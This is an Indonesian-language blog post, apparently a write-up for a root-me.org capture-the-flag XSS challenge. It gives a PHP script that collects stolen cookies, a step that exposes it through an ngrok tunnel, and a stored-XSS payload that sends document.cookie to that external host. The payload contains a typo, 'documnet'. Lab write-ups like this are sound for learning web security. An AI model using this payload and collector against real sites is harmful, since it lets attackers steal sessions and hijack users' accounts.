Ok tema kali ini ada CTF dengan kasus pencurian cookie ( Cookie Stealing ). Pertama saya jelaskan sedikit apa itu cookie bukan jajan seperti di atas.
Cookie merupakan parameter yang berada di browser dimana cookie di dapat dari server http atau https yang kamu akses. Cookie menyimpan informasi interaksi yang kita lakukan saat mengakses situs tertentu. Cookie dapat di manfaatkan oleh attacker atau cracker untuk menyusup ke situs yang kamu kunjungi dengan account pada saat kamu login ke web tersebut.
Nah pada challenge CTF root-me.org, Web Client - XSS Stored 1 kita disuruh mencuri cookie admin. Dimana kita mendapat url : http://challenge01.root-me.org/web-client/ch18/, di url ini kita dapat memposting artikel dengan privilage visitor, yang dimana artikel kita akan di read beberapa detik setelah kita posting oleh admin. Kita dapat mencuri cookie admin ketika admin meread postingan kita.
Pertama kita membuat file steal-cookies.php lakukan di localhost saja atau di htdoc jika menggunakan wedus gembel. Kita akan menggunakan ngrok yap ngrok untuk mentunelling web localhost yang kita buat sehingga bisa di akses public. Jika belum punya silakan di install dulu ngrok.io. Mari sedikit mengcoding php code bisa di lihat di bawa.
<?php
if(isset($_GET['cookie'])){
$myfile = fopen("cookie-steal.txt", "w") or die("Unable to open file!");
fwrite($myfile, $_GET['cookie']);
fclose($myfile);
echo "Yiha your cookie traped in here.";
}else{
echo "Hell boy not you access.";
}
?>
Silakan di copas saja dan ingat membuat file cookie-steal.txt dengan permission 777 sehingga dapat mewrite file tersebut.
Setelah itu kita jalankan ngrok dengan perintah ngrok http 80 ini bertujuan mentunel http ke port 80 yang mengarah ke localhost kita. Ooo iya tak cuman http kita juga dapat mentunel port tcp yang lainnya dengan syarat kita sudah mensetting oauth ngrok itu sendiri. Oauth di dapat setelah mendaftar di ngrok.io.
Setelah persiapan kita siap tinggal eksekusi target dengan script JS berikut ini.
<script>var i = new Image();i.src = "http://aae57b0e.us.ngrok.io/steal-cookies.php?cookie="+documnet.cookie;alert("PWNED!!! Your cookie trapped");</script>
Silakan sesuaikan dengan link yang di dapat dari ngrok itu sendiri karena subdomain yang di dapat di random oleh ngrok.
Script ini bekerja dengan manipulasi src image dengan request image ke url yang kita settting, namu yang terjadi adalah terkirimnya cookie ke url yang kita setting berserta cookienya.
Tunggu sampai postingan terbaca dan cookie terkirim ke url yang kita setting.
Nah sudah dapat cookienya di challenge ini cookie admin merupakan flagnya.
0 comments:
Post a Comment